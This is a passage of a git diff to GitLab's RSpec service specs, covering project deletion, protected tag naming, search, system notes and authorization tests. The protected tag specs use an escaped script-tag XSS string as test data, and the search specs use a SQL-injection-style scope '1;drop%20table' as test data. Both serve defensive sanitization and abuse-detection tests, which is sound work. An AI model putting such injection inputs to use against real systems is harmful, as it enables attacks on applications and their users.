false) + it 'avoids N+1 queries' do + recorder = ActiveRecord::QueryRecorder.new { destroy_project(project, user, {}) } - it 'avoids N+1 queries' do - recorder = ActiveRecord::QueryRecorder.new { destroy_project(project, user, {}) } + project = create(:project, :repository, namespace: user.namespace) + pipeline = create(:ci_pipeline, project: project) + builds = create_list(:ci_build, 3, :artifacts, pipeline: pipeline) + create(:ci_pipeline_artifact, pipeline: pipeline) + create_list(:ci_build_trace_chunk, 3, build: builds[0]) - project = create(:project, :repository, namespace: user.namespace) - pipeline = create(:ci_pipeline, project: project) - builds = create_list(:ci_build, 3, :artifacts, pipeline: pipeline) - create(:ci_pipeline_artifact, pipeline: pipeline) - create_list(:ci_build_trace_chunk, 3, build: builds[0]) - - expect { destroy_project(project, project.owner, {}) }.not_to exceed_query_limit(recorder) - end - end - - context 'with ci_optimize_project_records_destruction disabled' do - stub_feature_flags(ci_optimize_project_records_destruction: false) - - it 'avoids N+1 queries' do - recorder = ActiveRecord::QueryRecorder.new { destroy_project(project, user, {}) } - - project = create(:project, :repository, namespace: user.namespace) - pipeline = create(:ci_pipeline, project: project) - builds = create_list(:ci_build, 3, :artifacts, pipeline: pipeline) - create_list(:ci_build_trace_chunk, 3, build: builds[0]) - - expect { destroy_project(project, project.owner, {}) }.not_to exceed_query_limit(recorder) - end - end - - context 'with ci_optimize_project_records_destruction and abort_deleted_project_pipelines enabled' do - it 'avoids N+1 queries' do - recorder = ActiveRecord::QueryRecorder.new { destroy_project(project, user, {}) } - - project = create(:project, :repository, namespace: user.namespace) - pipeline = create(:ci_pipeline, project: project) - builds = create_list(:ci_build, 3, :artifacts, pipeline: pipeline) - create_list(:ci_build_trace_chunk, 
3, build: builds[0]) - - expect { destroy_project(project, project.owner, {}) }.not_to exceed_query_limit(recorder) - end + expect { destroy_project(project, project.owner, {}) }.not_to exceed_query_limit(recorder) end it_behaves_like 'deleting the project' @@ -132,64 +100,22 @@ RSpec.describe Projects::DestroyService, :aggregate_failures do destroy_project(project, user, {}) end - context 'with abort_deleted_project_pipelines feature disabled' do - before do - stub_feature_flags(abort_deleted_project_pipelines: false) - end - - it 'does not bulk-fail project ci pipelines' do - expect(::Ci::AbortPipelinesService).not_to receive(:new) - - destroy_project(project, user, {}) - end - - it 'does not destroy CI records via DestroyPipelineService' do - expect(::Ci::DestroyPipelineService).not_to receive(:new) - - destroy_project(project, user, {}) - end - end - - context 'with abort_deleted_project_pipelines feature enabled' do + context 'with running pipelines' do let!(:pipelines) { create_list(:ci_pipeline, 3, :running, project: project) } let(:destroy_pipeline_service) { double('DestroyPipelineService', execute: nil) } - context 'with ci_optimize_project_records_destruction disabled' do - before do - stub_feature_flags(ci_optimize_project_records_destruction: false) - end - - it 'bulk-fails project ci pipelines' do - expect(::Ci::AbortPipelinesService) - .to receive_message_chain(:new, :execute) - .with(project.all_pipelines, :project_deleted) - - destroy_project(project, user, {}) - end + it 'bulks-fails with AbortPipelineService and then executes DestroyPipelineService for each pipelines' do + allow(::Ci::DestroyPipelineService).to receive(:new).and_return(destroy_pipeline_service) - it 'does not destroy CI records via DestroyPipelineService' do - expect(::Ci::DestroyPipelineService).not_to receive(:new) + expect(::Ci::AbortPipelinesService) + .to receive_message_chain(:new, :execute) + .with(project.all_pipelines, :project_deleted) - destroy_project(project, user, 
{}) + pipelines.each do |pipeline| + expect(destroy_pipeline_service).to receive(:execute).with(pipeline) end - end - - context 'with ci_optimize_project_records_destruction enabled' do - it 'executes DestroyPipelineService for project ci pipelines' do - allow(::Ci::DestroyPipelineService).to receive(:new).and_return(destroy_pipeline_service) - expect(::Ci::AbortPipelinesService) - .to receive_message_chain(:new, :execute) - .with(project.all_pipelines, :project_deleted) - - pipelines.each do |pipeline| - expect(destroy_pipeline_service) - .to receive(:execute) - .with(pipeline) - end - - destroy_project(project, user, {}) - end + destroy_project(project, user, {}) end end @@ -545,6 +471,27 @@ RSpec.describe Projects::DestroyService, :aggregate_failures do end end + context 'when project has events' do + let!(:event) { create(:event, :created, project: project, target: project, author: user) } + + it 'deletes events from the project' do + expect do + destroy_project(project, user) + end.to change(Event, :count).by(-1) + end + + context 'when an error is returned while deleting events' do + it 'does not delete project' do + allow_next_instance_of(Events::DestroyService) do |instance| + allow(instance).to receive(:execute).and_return(ServiceResponse.error(message: 'foo')) + end + + expect(destroy_project(project, user)).to be_falsey + expect(project.delete_error).to include('Failed to remove events') + end + end + end + context 'error while destroying', :sidekiq_inline do let!(:pipeline) { create(:ci_pipeline, project: project) } let!(:builds) { create_list(:ci_build, 2, :artifacts, pipeline: pipeline) } diff --git a/spec/services/projects/prometheus/alerts/create_service_spec.rb b/spec/services/projects/prometheus/alerts/create_service_spec.rb index c0bc9336558..6b9d43e4e81 100644 --- a/spec/services/projects/prometheus/alerts/create_service_spec.rb +++ b/spec/services/projects/prometheus/alerts/create_service_spec.rb @@ -6,7 +6,7 @@ RSpec.describe 
Projects::Prometheus::Alerts::CreateService do let_it_be(:project) { create(:project) } let_it_be(:user) { create(:user) } - let(:service) { described_class.new(project, user, params) } + let(:service) { described_class.new(project: project, current_user: user, params: params) } subject { service.execute } diff --git a/spec/services/projects/prometheus/alerts/destroy_service_spec.rb b/spec/services/projects/prometheus/alerts/destroy_service_spec.rb index 573711051b7..a3e9c3516c2 100644 --- a/spec/services/projects/prometheus/alerts/destroy_service_spec.rb +++ b/spec/services/projects/prometheus/alerts/destroy_service_spec.rb @@ -7,7 +7,7 @@ RSpec.describe Projects::Prometheus::Alerts::DestroyService do let_it_be(:user) { create(:user) } let_it_be(:alert) { create(:prometheus_alert, project: project) } - let(:service) { described_class.new(project, user, nil) } + let(:service) { described_class.new(project: project, current_user: user, params: nil) } describe '#execute' do subject { service.execute(alert) } diff --git a/spec/services/projects/prometheus/alerts/update_service_spec.rb b/spec/services/projects/prometheus/alerts/update_service_spec.rb index e831d001838..ec6766221f6 100644 --- a/spec/services/projects/prometheus/alerts/update_service_spec.rb +++ b/spec/services/projects/prometheus/alerts/update_service_spec.rb @@ -11,7 +11,7 @@ RSpec.describe Projects::Prometheus::Alerts::UpdateService do create(:prometheus_alert, project: project, environment: environment) end - let(:service) { described_class.new(project, user, params) } + let(:service) { described_class.new(project: project, current_user: user, params: params) } let(:params) do { diff --git a/spec/services/projects/transfer_service_spec.rb b/spec/services/projects/transfer_service_spec.rb index c47d44002cc..ddd16100b40 100644 --- a/spec/services/projects/transfer_service_spec.rb +++ b/spec/services/projects/transfer_service_spec.rb @@ -169,7 +169,7 @@ RSpec.describe Projects::TransferService do end 
end - context 'when project has pending builds' do + context 'when project has pending builds', :sidekiq_inline do let!(:other_project) { create(:project) } let!(:pending_build) { create(:ci_pending_build, project: project.reload) } let!(:unrelated_pending_build) { create(:ci_pending_build, project: other_project) } @@ -251,7 +251,7 @@ RSpec.describe Projects::TransferService do ) end - context 'when project has pending builds' do + context 'when project has pending builds', :sidekiq_inline do let!(:other_project) { create(:project) } let!(:pending_build) { create(:ci_pending_build, project: project.reload) } let!(:unrelated_pending_build) { create(:ci_pending_build, project: other_project) } diff --git a/spec/services/protected_tags/create_service_spec.rb b/spec/services/protected_tags/create_service_spec.rb index e85a43eb51c..3d06cc9fb6c 100644 --- a/spec/services/protected_tags/create_service_spec.rb +++ b/spec/services/protected_tags/create_service_spec.rb @@ -7,17 +7,54 @@ RSpec.describe ProtectedTags::CreateService do let(:user) { project.owner } let(:params) do { - name: 'master', + name: name, create_access_levels_attributes: [{ access_level: Gitlab::Access::MAINTAINER }] } end describe '#execute' do + let(:name) { 'tag' } + subject(:service) { described_class.new(project, user, params) } it 'creates a new protected tag' do expect { service.execute }.to change(ProtectedTag, :count).by(1) expect(project.protected_tags.last.create_access_levels.map(&:access_level)).to eq([Gitlab::Access::MAINTAINER]) end + + context 'when name has escaped HTML' do + let(:name) { 'tag-&gt;test' } + + it 'creates the new protected tag matching the unescaped version' do + expect { service.execute }.to change(ProtectedTag, :count).by(1) + expect(project.protected_tags.last.name).to eq('tag->test') + end + + context 'and name contains HTML tags' do + let(:name) { '&lt;b&gt;tag&lt;/b&gt;' } + + it 'creates the new protected tag with sanitized name' do + expect { service.execute }.to 
change(ProtectedTag, :count).by(1) + expect(project.protected_tags.last.name).to eq('tag') + end + + context 'and contains unsafe HTML' do + let(:name) { '&lt;script&gt;alert(&#39;foo&#39;);&lt;/script&gt;' } + + it 'does not create the new protected tag' do + expect { service.execute }.not_to change(ProtectedTag, :count) + end + end + end + + context 'when name contains unescaped HTML tags' do + let(:name) { '<b>tag</b>' } + + it 'creates the new protected tag with sanitized name' do + expect { service.execute }.to change(ProtectedTag, :count).by(1) + expect(project.protected_tags.last.name).to eq('tag') + end + end + end end end diff --git a/spec/services/protected_tags/update_service_spec.rb b/spec/services/protected_tags/update_service_spec.rb index ed151ca2347..22005bb9b89 100644 --- a/spec/services/protected_tags/update_service_spec.rb +++ b/spec/services/protected_tags/update_service_spec.rb @@ -6,17 +6,50 @@ RSpec.describe ProtectedTags::UpdateService do let(:protected_tag) { create(:protected_tag) } let(:project) { protected_tag.project } let(:user) { project.owner } - let(:params) { { name: 'new protected tag name' } } + let(:params) { { name: new_name } } describe '#execute' do + let(:new_name) { 'new protected tag name' } + let(:result) { service.execute(protected_tag) } + subject(:service) { described_class.new(project, user, params) } it 'updates a protected tag' do - result = service.execute(protected_tag) - expect(result.reload.name).to eq(params[:name]) end + context 'when name has escaped HTML' do + let(:new_name) { 'tag-&gt;test' } + + it 'updates protected tag name with unescaped HTML' do + expect(result.reload.name).to eq('tag->test') + end + + context 'and name contains HTML tags' do + let(:new_name) { '&lt;b&gt;tag&lt;/b&gt;' } + + it 'updates protected tag name with sanitized name' do + expect(result.reload.name).to eq('tag') + end + + context 'and contains unsafe HTML' do + let(:new_name) { '&lt;script&gt;alert(&#39;foo&#39;);&lt;/script&gt;' } + + it 'does not update the protected tag' do + 
expect(result.reload.name).to eq(protected_tag.name) + end + end + end + end + + context 'when name contains unescaped HTML tags' do + let(:new_name) { '<b>tag</b>' } + + it 'updates protected tag name with sanitized name' do + expect(result.reload.name).to eq('tag') + end + end + context 'without admin_project permissions' do let(:user) { create(:user) } diff --git a/spec/services/quick_actions/interpret_service_spec.rb b/spec/services/quick_actions/interpret_service_spec.rb index 611261cd92c..77d263f4b70 100644 --- a/spec/services/quick_actions/interpret_service_spec.rb +++ b/spec/services/quick_actions/interpret_service_spec.rb @@ -3,7 +3,8 @@ require 'spec_helper' RSpec.describe QuickActions::InterpretService do - let_it_be(:public_project) { create(:project, :public) } + let_it_be(:group) { create(:group) } + let_it_be(:public_project) { create(:project, :public, group: group) } let_it_be(:repository_project) { create(:project, :repository) } let_it_be(:project) { public_project } let_it_be(:developer) { create(:user) } @@ -2233,6 +2234,51 @@ RSpec.describe QuickActions::InterpretService do end end end + + context 'crm_contact commands' do + let_it_be(:new_contact) { create(:contact, group: group) } + let_it_be(:existing_contact) { create(:contact, group: group) } + + let(:add_command) { service.execute("/add_contacts #{new_contact.email}", issue) } + let(:remove_command) { service.execute("/remove_contacts #{existing_contact.email}", issue) } + + before do + issue.project.group.add_developer(developer) + create(:issue_customer_relations_contact, issue: issue, contact: existing_contact) + end + + context 'with feature flag disabled' do + before do + stub_feature_flags(customer_relations: false) + end + + it 'add_contacts command does not add the contact' do + _, updates, _ = add_command + + expect(updates).to be_empty + end + + it 'remove_contacts command does not remove the contact' do + _, updates, _ = remove_command + + expect(updates).to be_empty + end + 
end + + it 'add_contacts command adds the contact' do + _, updates, message = add_command + + expect(updates).to eq(add_contacts: [new_contact.email]) + expect(message).to eq('One or more contacts were successfully added.') + end + + it 'remove_contacts command removes the contact' do + _, updates, message = remove_command + + expect(updates).to eq(remove_contacts: [existing_contact.email]) + expect(message).to eq('One or more contacts were successfully removed.') + end + end end describe '#explain' do diff --git a/spec/services/repositories/changelog_service_spec.rb b/spec/services/repositories/changelog_service_spec.rb index b547ae17317..ddb8e7e1182 100644 --- a/spec/services/repositories/changelog_service_spec.rb +++ b/spec/services/repositories/changelog_service_spec.rb @@ -61,6 +61,8 @@ RSpec.describe Repositories::ChangelogService do let!(:commit2) { project.commit(sha3) } let!(:commit3) { project.commit(sha4) } + let(:commit_to_changelog) { true } + it 'generates and commits a changelog section' do allow(MergeRequestDiffCommit) .to receive(:oldest_merge_request_id_per_commit) @@ -73,7 +75,7 @@ RSpec.describe Repositories::ChangelogService do service = described_class .new(project, creator, version: '1.0.0', from: sha1, to: sha3) - recorder = ActiveRecord::QueryRecorder.new { service.execute } + recorder = ActiveRecord::QueryRecorder.new { service.execute(commit_to_changelog: commit_to_changelog) } changelog = project.repository.blob_at('master', 'CHANGELOG.md')&.data expect(recorder.count).to eq(9) @@ -90,7 +92,7 @@ RSpec.describe Repositories::ChangelogService do described_class .new(project, creator, version: '1.0.0', from: sha1) - .execute + .execute(commit_to_changelog: commit_to_changelog) changelog = project.repository.blob_at('master', 'CHANGELOG.md')&.data @@ -108,7 +110,7 @@ RSpec.describe Repositories::ChangelogService do described_class .new(project, creator, version: '1.0.0', from: sha1) - .execute + .execute(commit_to_changelog: 
commit_to_changelog) changelog = project.repository.blob_at('master', 'CHANGELOG.md')&.data @@ -119,12 +121,33 @@ RSpec.describe Repositories::ChangelogService do it 'uses the target branch when "to" is unspecified' do described_class .new(project, creator, version: '1.0.0', from: sha1) - .execute + .execute(commit_to_changelog: commit_to_changelog) changelog = project.repository.blob_at('master', 'CHANGELOG.md')&.data expect(changelog).to include('Title 1', 'Title 2', 'Title 3') end + + describe 'with commit_to_changelog: false' do + let(:commit_to_changelog) { false } + + it 'generates changelog section' do + allow(MergeRequestDiffCommit) + .to receive(:oldest_merge_request_id_per_commit) + .with(project.id, [commit2.id, commit1.id]) + .and_return([ + { sha: sha2, merge_request_id: mr1.id }, + { sha: sha3, merge_request_id: mr2.id } + ]) + + service = described_class + .new(project, creator, version: '1.0.0', from: sha1, to: sha3) + + changelog = service.execute(commit_to_changelog: commit_to_changelog) + + expect(changelog).to include('Title 1', 'Title 2') + end + end end describe '#start_of_commit_range' do diff --git a/spec/services/search_service_spec.rb b/spec/services/search_service_spec.rb index 40fb257b23e..d7a36ff370e 100644 --- a/spec/services/search_service_spec.rb +++ b/spec/services/search_service_spec.rb @@ -20,6 +20,7 @@ RSpec.describe SearchService do let(:page) { 1 } let(:per_page) { described_class::DEFAULT_PER_PAGE } + let(:valid_search) { "what is love?" 
} subject(:search_service) { described_class.new(user, search: search, scope: scope, page: page, per_page: per_page) } @@ -30,7 +31,7 @@ RSpec.describe SearchService do describe '#project' do context 'when the project is accessible' do it 'returns the project' do - project = described_class.new(user, project_id: accessible_project.id).project + project = described_class.new(user, project_id: accessible_project.id, search: valid_search).project expect(project).to eq accessible_project end @@ -39,7 +40,7 @@ RSpec.describe SearchService do search_project = create :project search_project.add_guest(user) - project = described_class.new(user, project_id: search_project.id).project + project = described_class.new(user, project_id: search_project.id, search: valid_search).project expect(project).to eq search_project end @@ -47,7 +48,7 @@ RSpec.describe SearchService do context 'when the project is not accessible' do it 'returns nil' do - project = described_class.new(user, project_id: inaccessible_project.id).project + project = described_class.new(user, project_id: inaccessible_project.id, search: valid_search).project expect(project).to be_nil end @@ -55,7 +56,7 @@ RSpec.describe SearchService do context 'when there is no project_id' do it 'returns nil' do - project = described_class.new(user).project + project = described_class.new(user, search: valid_search).project expect(project).to be_nil end @@ -65,7 +66,7 @@ RSpec.describe SearchService do describe '#group' do context 'when the group is accessible' do it 'returns the group' do - group = described_class.new(user, group_id: accessible_group.id).group + group = described_class.new(user, group_id: accessible_group.id, search: valid_search).group expect(group).to eq accessible_group end @@ -73,7 +74,7 @@ RSpec.describe SearchService do context 'when the group is not accessible' do it 'returns nil' do - group = described_class.new(user, group_id: inaccessible_group.id).group + group = described_class.new(user, group_id: 
inaccessible_group.id, search: valid_search).group expect(group).to be_nil end @@ -81,7 +82,7 @@ RSpec.describe SearchService do context 'when there is no group_id' do it 'returns nil' do - group = described_class.new(user).group + group = described_class.new(user, search: valid_search).group expect(group).to be_nil end @@ -118,7 +119,7 @@ RSpec.describe SearchService do context 'with accessible project_id' do context 'and allowed scope' do it 'returns the specified scope' do - scope = described_class.new(user, project_id: accessible_project.id, scope: 'notes').scope + scope = described_class.new(user, project_id: accessible_project.id, scope: 'notes', search: valid_search).scope expect(scope).to eq 'notes' end @@ -126,7 +127,7 @@ RSpec.describe SearchService do context 'and disallowed scope' do it 'returns the default scope' do - scope = described_class.new(user, project_id: accessible_project.id, scope: 'projects').scope + scope = described_class.new(user, project_id: accessible_project.id, scope: 'projects', search: valid_search).scope expect(scope).to eq 'blobs' end @@ -134,7 +135,7 @@ RSpec.describe SearchService do context 'and no scope' do it 'returns the default scope' do - scope = described_class.new(user, project_id: accessible_project.id).scope + scope = described_class.new(user, project_id: accessible_project.id, search: valid_search).scope expect(scope).to eq 'blobs' end @@ -552,4 +553,87 @@ RSpec.describe SearchService do end end end + + describe '#valid_request?' do + let(:scope) { 'issues' } + let(:search) { 'foobar' } + let(:params) { instance_double(Gitlab::Search::Params) } + + before do + allow(Gitlab::Search::Params).to receive(:new).and_return(params) + allow(params).to receive(:valid?).and_return double(:valid?) + end + + it 'is the return value of params.valid?' do + expect(subject.valid_request?).to eq(params.valid?) 
+ end + end + + describe '#abuse_messages' do + let(:scope) { 'issues' } + let(:search) { 'foobar' } + let(:params) { instance_double(Gitlab::Search::Params) } + + before do + allow(Gitlab::Search::Params).to receive(:new).and_return(params) + end + + it 'returns an empty array when not abusive' do + allow(params).to receive(:abusive?).and_return false + expect(subject.abuse_messages).to match_array([]) + end + + it 'calls on abuse_detection.errors.full_messages when abusive' do + allow(params).to receive(:abusive?).and_return true + expect(params).to receive_message_chain(:abuse_detection, :errors, :full_messages) + subject.abuse_messages + end + end + + describe 'abusive search handling' do + subject { described_class.new(user, raw_params) } + + let(:raw_params) { { search: search, scope: scope } } + let(:search) { 'foobar' } + + let(:search_service) { double(:search_service) } + + before do + stub_feature_flags(prevent_abusive_searches: should_detect_abuse) + expect(Gitlab::Search::Params).to receive(:new) + .with(raw_params, detect_abuse: should_detect_abuse).and_call_original + + allow(subject).to receive(:search_service).and_return search_service + end + + context 'when abusive search but prevent_abusive_searches FF is disabled' do + let(:should_detect_abuse) { false } + let(:scope) { '1;drop%20table' } + + it 'executes search even if params are abusive' do + expect(search_service).to receive(:execute) + subject.search_results + end + end + + context 'a search is abusive' do + let(:should_detect_abuse) { true } + let(:scope) { '1;drop%20table' } + + it 'does NOT execute search service' do + expect(search_service).not_to receive(:execute) + subject.search_results + end + end + + context 'a search is NOT abusive' do + let(:should_detect_abuse) { true } + let(:scope) { 'issues' } + + it 'executes search service' do + expect(search_service).to receive(:execute) + subject.search_results + end + end + end end diff --git 
a/spec/services/service_ping/submit_service_ping_service_spec.rb b/spec/services/service_ping/submit_service_ping_service_spec.rb index d8672eec682..ca387690e83 100644 --- a/spec/services/service_ping/submit_service_ping_service_spec.rb +++ b/spec/services/service_ping/submit_service_ping_service_spec.rb @@ -322,6 +322,25 @@ RSpec.describe ServicePing::SubmitService do expect { subject.execute }.to raise_error(described_class::SubmissionError) end end + + context 'when skip_db_write passed to service' do + let(:subject) { ServicePing::SubmitService.new(skip_db_write: true) } + + before do + stub_response(body: with_dev_ops_score_params) + end + + it 'does not save RawUsageData' do + expect { subject.execute } + .not_to change { RawUsageData.count } + end + + it 'does not call DevOpsReport service' do + expect(ServicePing::DevopsReportService).not_to receive(:new) + + subject.execute + end + end end describe '#url' do diff --git a/spec/services/system_note_service_spec.rb b/spec/services/system_note_service_spec.rb index ce0122ae301..3ec2c71b20c 100644 --- a/spec/services/system_note_service_spec.rb +++ b/spec/services/system_note_service_spec.rb @@ -146,6 +146,30 @@ RSpec.describe SystemNoteService do end end + describe '.request_attention' do + let(:user) { double } + + it 'calls IssuableService' do + expect_next_instance_of(::SystemNotes::IssuablesService) do |service| + expect(service).to receive(:request_attention).with(user) + end + + described_class.request_attention(noteable, project, author, user) + end + end + + describe '.remove_attention_request' do + let(:user) { double } + + it 'calls IssuableService' do + expect_next_instance_of(::SystemNotes::IssuablesService) do |service| + expect(service).to receive(:remove_attention_request).with(user) + end + + described_class.remove_attention_request(noteable, project, author, user) + end + end + describe '.merge_when_pipeline_succeeds' do it 'calls MergeRequestsService' do sha = double @@ -287,38 +311,38 @@ 
RSpec.describe SystemNoteService do end describe '.cross_reference' do - let(:mentioner) { double } + let(:mentioned_in) { double } it 'calls IssuableService' do expect_next_instance_of(::SystemNotes::IssuablesService) do |service| - expect(service).to receive(:cross_reference).with(mentioner) + expect(service).to receive(:cross_reference).with(mentioned_in) end - described_class.cross_reference(double, mentioner, double) + described_class.cross_reference(double, mentioned_in, double) end end describe '.cross_reference_disallowed?' do - let(:mentioner) { double } + let(:mentioned_in) { double } it 'calls IssuableService' do expect_next_instance_of(::SystemNotes::IssuablesService) do |service| - expect(service).to receive(:cross_reference_disallowed?).with(mentioner) + expect(service).to receive(:cross_reference_disallowed?).with(mentioned_in) end - described_class.cross_reference_disallowed?(double, mentioner) + described_class.cross_reference_disallowed?(double, mentioned_in) end end describe '.cross_reference_exists?' do - let(:mentioner) { double } + let(:mentioned_in) { double } it 'calls IssuableService' do expect_next_instance_of(::SystemNotes::IssuablesService) do |service| - expect(service).to receive(:cross_reference_exists?).with(mentioner) + expect(service).to receive(:cross_reference_exists?).with(mentioned_in) end - described_class.cross_reference_exists?(double, mentioner) + described_class.cross_reference_exists?(double, mentioned_in) end end diff --git a/spec/services/system_notes/commit_service_spec.rb b/spec/services/system_notes/commit_service_spec.rb index bd6b3ec953a..0399603980d 100644 --- a/spec/services/system_notes/commit_service_spec.rb +++ b/spec/services/system_notes/commit_service_spec.rb @@ -57,7 +57,7 @@ RSpec.describe SystemNotes::CommitService do end context 'with multiple existing commits' do - let(:old_commits) { noteable.commits[3..-1] } + let(:old_commits) { noteable.commits[3..] 
} context 'with oldrev' do let(:oldrev) { noteable.commits[2].id } diff --git a/spec/services/system_notes/issuables_service_spec.rb b/spec/services/system_notes/issuables_service_spec.rb index fd481aa6ddb..7e53e66303b 100644 --- a/spec/services/system_notes/issuables_service_spec.rb +++ b/spec/services/system_notes/issuables_service_spec.rb @@ -199,6 +199,42 @@ RSpec.describe ::SystemNotes::IssuablesService do end end + describe '#request_attention' do + subject { service.request_attention(user) } + + let(:user) { create(:user) } + + it_behaves_like 'a system note' do + let(:action) { 'attention_requested' } + end + + context 'when attention requested' do + it_behaves_like 'a note with overridable created_at' + + it 'sets the note text' do + expect(subject.note).to eq "requested attention from @#{user.username}" + end + end + end + + describe '#remove_attention_request' do + subject { service.remove_attention_request(user) } + + let(:user) { create(:user) } + + it_behaves_like 'a system note' do + let(:action) { 'attention_request_removed' } + end + + context 'when attention request is removed' do + it_behaves_like 'a note with overridable created_at' + + it 'sets the note text' do + expect(subject.note).to eq "removed attention request from @#{user.username}" + end + end + end + describe '#change_title' do let(:noteable) { create(:issue, project: project, title: 'Lorem ipsum') } @@ -274,9 +310,9 @@ RSpec.describe ::SystemNotes::IssuablesService do describe '#cross_reference' do let(:service) { described_class.new(noteable: noteable, author: author) } - let(:mentioner) { create(:issue, project: project) } + let(:mentioned_in) { create(:issue, project: project) } - subject { service.cross_reference(mentioner) } + subject { service.cross_reference(mentioned_in) } it_behaves_like 'a system note' do let(:action) { 'cross_reference' } @@ -314,35 +350,35 @@ RSpec.describe ::SystemNotes::IssuablesService do describe 'note_body' do context 'cross-project' do 
let(:project2) { create(:project, :repository) } - let(:mentioner) { create(:issue, project: project2) } + let(:mentioned_in) { create(:issue, project: project2) } context 'from Commit' do - let(:mentioner) { project2.repository.commit } + let(:mentioned_in) { project2.repository.commit } it 'references the mentioning commit' do - expect(subject.note).to eq "mentioned in commit #{mentioner.to_reference(project)}" + expect(subject.note).to eq "mentioned in commit #{mentioned_in.to_reference(project)}" end end context 'from non-Commit' do it 'references the mentioning object' do - expect(subject.note).to eq "mentioned in issue #{mentioner.to_reference(project)}" + expect(subject.note).to eq "mentioned in issue #{mentioned_in.to_reference(project)}" end end end context 'within the same project' do context 'from Commit' do - let(:mentioner) { project.repository.commit } + let(:mentioned_in) { project.repository.commit } it 'references the mentioning commit' do - expect(subject.note).to eq "mentioned in commit #{mentioner.to_reference}" + expect(subject.note).to eq "mentioned in commit #{mentioned_in.to_reference}" end end context 'from non-Commit' do it 'references the mentioning object' do - expect(subject.note).to eq "mentioned in issue #{mentioner.to_reference}" + expect(subject.note).to eq "mentioned in issue #{mentioned_in.to_reference}" end end end @@ -350,14 +386,14 @@ RSpec.describe ::SystemNotes::IssuablesService do context 'with external issue' do let(:noteable) { ExternalIssue.new('JIRA-123', project) } - let(:mentioner) { project.commit } + let(:mentioned_in) { project.commit } it 'queues a background worker' do expect(Integrations::CreateExternalCrossReferenceWorker).to receive(:perform_async).with( project.id, 'JIRA-123', 'Commit', - mentioner.id, + mentioned_in.id, author.id ) @@ -716,28 +752,28 @@ RSpec.describe ::SystemNotes::IssuablesService do end describe '#cross_reference_disallowed?' 
do - context 'when mentioner is not a MergeRequest' do + context 'when mentioned_in is not a MergeRequest' do it 'is falsey' do - mentioner = noteable.dup + mentioned_in = noteable.dup - expect(service.cross_reference_disallowed?(mentioner)).to be_falsey + expect(service.cross_reference_disallowed?(mentioned_in)).to be_falsey end end - context 'when mentioner is a MergeRequest' do - let(:mentioner) { create(:merge_request, :simple, source_project: project) } - let(:noteable) { project.commit } + context 'when mentioned_in is a MergeRequest' do + let(:mentioned_in) { create(:merge_request, :simple, source_project: project) } + let(:noteable) { project.commit } it 'is truthy when noteable is in commits' do - expect(mentioner).to receive(:commits).and_return([noteable]) + expect(mentioned_in).to receive(:commits).and_return([noteable]) - expect(service.cross_reference_disallowed?(mentioner)).to be_truthy + expect(service.cross_reference_disallowed?(mentioned_in)).to be_truthy end it 'is falsey when noteable is not in commits' do - expect(mentioner).to receive(:commits).and_return([]) + expect(mentioned_in).to receive(:commits).and_return([]) - expect(service.cross_reference_disallowed?(mentioner)).to be_falsey + expect(service.cross_reference_disallowed?(mentioned_in)).to be_falsey end end diff --git a/spec/services/todos/destroy/private_features_service_spec.rb b/spec/services/todos/destroy/unauthorized_features_service_spec.rb index 6dbd7574b80..5f6c9b0cdf0 100644 --- a/spec/services/todos/destroy/private_features_service_spec.rb +++ b/spec/services/todos/destroy/unauthorized_features_service_spec.rb @@ -2,13 +2,17 @@ require 'spec_helper' -RSpec.describe Todos::Destroy::PrivateFeaturesService do - let(:project) { create(:project, :public) } - let(:user) { create(:user) } - let(:another_user) { create(:user) } - let(:project_member) { create(:user) } - let(:issue) { create(:issue, project: project) } - let(:mr) { create(:merge_request, source_project: project) } 
+RSpec.describe Todos::Destroy::UnauthorizedFeaturesService do + let_it_be(:project, reload: true) { create(:project, :public, :repository) } + let_it_be(:issue) { create(:issue, project: project) } + let_it_be(:mr) { create(:merge_request, source_project: project) } + let_it_be(:user) { create(:user) } + let_it_be(:another_user) { create(:user) } + let_it_be(:project_member) do + create(:user).tap do |user| + project.add_developer(user) + end + end let!(:todo_mr_non_member) { create(:todo, user: user, target: mr, project: project) } let!(:todo_mr_non_member2) { create(:todo, user: another_user, target: mr, project: project) } @@ -20,10 +24,6 @@ RSpec.describe Todos::Destroy::PrivateFeaturesService do let!(:commit_todo_non_member2) { create(:on_commit_todo, user: another_user, project: project) } let!(:commit_todo_member) { create(:on_commit_todo, user: project_member, project: project) } - before do - project.add_developer(project_member) - end - context 'when user_id is provided' do subject { described_class.new(project.id, user.id).execute } diff --git a/spec/services/users/dismiss_user_callout_service_spec.rb b/spec/services/users/dismiss_callout_service_spec.rb index 6bf9961eb74..6ba9f180444 100644 --- a/spec/services/users/dismiss_user_callout_service_spec.rb +++ b/spec/services/users/dismiss_callout_service_spec.rb @@ -2,12 +2,12 @@ require 'spec_helper' -RSpec.describe Users::DismissUserCalloutService do +RSpec.describe Users::DismissCalloutService do describe '#execute' do let_it_be(:user) { create(:user) } let(:params) { { feature_name: feature_name } } - let(:feature_name) { UserCallout.feature_names.each_key.first } + let(:feature_name) { Users::Callout.feature_names.each_key.first } subject(:execute) do described_class.new( @@ -15,6 +15,6 @@ RSpec.describe Users::DismissUserCalloutService do ).execute end - it_behaves_like 'dismissing user callout', UserCallout + it_behaves_like 'dismissing user callout', Users::Callout end end diff --git 
a/spec/services/users/refresh_authorized_projects_service_spec.rb b/spec/services/users/refresh_authorized_projects_service_spec.rb index a8ad0d02f60..aa4df93a241 100644 --- a/spec/services/users/refresh_authorized_projects_service_spec.rb +++ b/spec/services/users/refresh_authorized_projects_service_spec.rb @@ -67,11 +67,17 @@ RSpec.describe Users::RefreshAuthorizedProjectsService do it 'updates the authorized projects of the user' do project2 = create(:project) - to_remove = user.project_authorizations + project_authorization = user.project_authorizations .create!(project: project2, access_level: Gitlab::Access::MAINTAINER) + to_be_removed = [project_authorization.project_id] + + to_be_added = [ + { user_id: user.id, project_id: project.id, access_level: Gitlab::Access::MAINTAINER } + ] + expect(service).to receive(:update_authorizations) - .with([to_remove.project_id], [[user.id, project.id, Gitlab::Access::MAINTAINER]]) + .with(to_be_removed, to_be_added) service.execute_without_lease end @@ -81,9 +87,14 @@ RSpec.describe Users::RefreshAuthorizedProjectsService do user.project_authorizations.create!(project: project, access_level: access_level) end + to_be_removed = [project.id] + + to_be_added = [ + { user_id: user.id, project_id: project.id, access_level: Gitlab::Access::MAINTAINER } + ] expect(service).to( receive(:update_authorizations) - .with([project.id], [[user.id, project.id, Gitlab::Access::MAINTAINER]]) + .with(to_be_removed, to_be_added) .and_call_original) service.execute_without_lease @@ -99,11 +110,17 @@ RSpec.describe Users::RefreshAuthorizedProjectsService do it 'sets the access level of a project to the highest available level' do 